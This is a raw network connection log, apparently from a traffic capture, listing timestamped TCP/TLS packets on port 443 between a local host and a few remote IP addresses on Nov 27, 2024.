                                                                                          Nov 27, 2024 15:15:11.216386080 CET44349731104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.216528893 CET44349731104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.216586113 CET49731443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.217108965 CET49731443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.217133045 CET44349731104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.223407984 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.223479033 CET49730443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.223486900 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.230431080 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.230504990 CET49730443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.230511904 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.237463951 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.237533092 CET49730443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.237540007 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.239114046 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.239166021 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.239234924 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.241297007 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.241312981 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.244441032 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.244499922 CET49730443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.244505882 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.244518042 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:11.244575977 CET49730443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.244643927 CET49730443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:11.244657993 CET44349730104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.265324116 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.265755892 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.265794992 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.266143084 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.266470909 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.266535044 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.266629934 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.307341099 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.509506941 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.509864092 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.509895086 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.510261059 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.510586977 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.510689020 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.510734081 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.551340103 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.559691906 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.726649046 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.726699114 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.726735115 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.726763964 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.726780891 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.726813078 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.726826906 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.735043049 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.735114098 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.735124111 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.743489027 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.743601084 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.743612051 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.798662901 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.798686028 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.846702099 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.846715927 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.850703001 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.850764036 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.850771904 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.896110058 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.927720070 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.931516886 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.931621075 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.931634903 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.942281008 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.942351103 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.942361116 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.950213909 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.950310946 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.950324059 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.958065987 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.958154917 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.958163977 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.965972900 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.966216087 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.966228962 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.973810911 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.973891973 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.973929882 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.975245953 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.975320101 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.975406885 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.976020098 CET49733443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.976052046 CET44349733104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.978996992 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.979033947 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.979118109 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.979378939 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.979396105 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.990500927 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.990565062 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.990575075 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.995836973 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.995901108 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.995907068 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:12.995915890 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:12.995973110 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.002437115 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.009202957 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.009351015 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.009377956 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.053709030 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.053730965 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.101744890 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.129056931 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.132329941 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.132461071 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.132477999 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.138644934 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.138711929 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.138721943 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.145298004 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.145387888 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.145397902 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.156419992 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.156523943 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.156533003 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.156589985 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.165338993 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.165354013 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.165450096 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.165458918 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.165529013 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.174649000 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.174666882 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.174777985 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.183497906 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.183511972 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.183593035 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.192533970 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.192547083 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.192665100 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.197145939 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.197241068 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.206249952 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.206403017 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.215708017 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.215871096 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.220078945 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.220206022 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.229918003 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.230025053 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.235580921 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.235645056 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.341700077 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.341847897 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.347800970 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.347896099 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.356046915 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.356125116 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.360549927 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.360635042 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.360649109 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.360708952 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.360768080 CET49732443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.360797882 CET44349732104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.363637924 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.363706112 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.363816977 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.364032984 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.364042997 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.382431030 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:13.427334070 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.530823946 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.530867100 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:13.530968904 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.531233072 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:13.531243086 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.224761963 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.225099087 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.225145102 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.225434065 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.225759983 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.225821972 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.225934029 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.271332026 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.277896881 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.277978897 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.278040886 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:14.278886080 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:14.278908968 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.422650099 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:14.422703028 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.422780991 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:14.423034906 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:14.423049927 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.640059948 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.640360117 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.640388966 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.640718937 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.641045094 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.641108990 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.641189098 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.670301914 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.670367956 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.670433044 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.671403885 CET49734443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.671431065 CET44349734104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.687338114 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.789880037 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.790209055 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.790227890 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.790584087 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.791026115 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.791088104 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.791177034 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.791213989 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:14.791246891 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.093863964 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.093930006 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.093981028 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.094022036 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.094031096 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.094067097 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.094079971 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.094120979 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.094172955 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.094182014 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.109556913 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.109607935 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.109632015 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.109641075 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.109683037 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.118006945 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.173649073 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.213730097 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.268652916 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.268665075 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.298171043 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.298316956 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.298335075 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.304471016 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.304511070 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.304565907 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.304580927 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.304649115 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.307538033 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.307590008 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.307637930 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.307682037 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.307682991 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.307694912 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.307734013 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.307734966 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.307743073 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.307786942 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.312239885 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.315607071 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.315669060 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.320193052 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.320255041 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.320266962 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.321598053 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.327889919 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.327965021 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.327974081 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.329869032 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.329931021 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.329938889 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.335777998 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.335834980 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.335844994 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.351097107 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.351125956 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.351157904 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.351167917 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.351299047 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.358210087 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.365219116 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.365287066 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.365295887 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.372391939 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.372419119 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.372446060 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.372454882 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.372504950 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.378707886 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.379348993 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.414432049 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.414499998 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.414514065 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.427350998 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.458697081 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.474684954 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.474694014 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.495426893 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.498933077 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.498996019 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.499027014 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.508583069 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.508672953 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.508692026 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.512433052 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.512490034 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.512497902 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.515832901 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.515897989 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.515921116 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.515990973 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.521898985 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.521960974 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.521965981 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.529759884 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.529767990 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.529853106 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.529947996 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.530005932 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.530010939 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.536741972 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.536794901 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.537935019 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.538008928 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.538013935 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.543878078 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.543884039 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.543946028 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.545913935 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.545965910 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.545972109 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.552335978 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.552341938 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.552429914 CET49735443192.168.2.16104.18.94.41
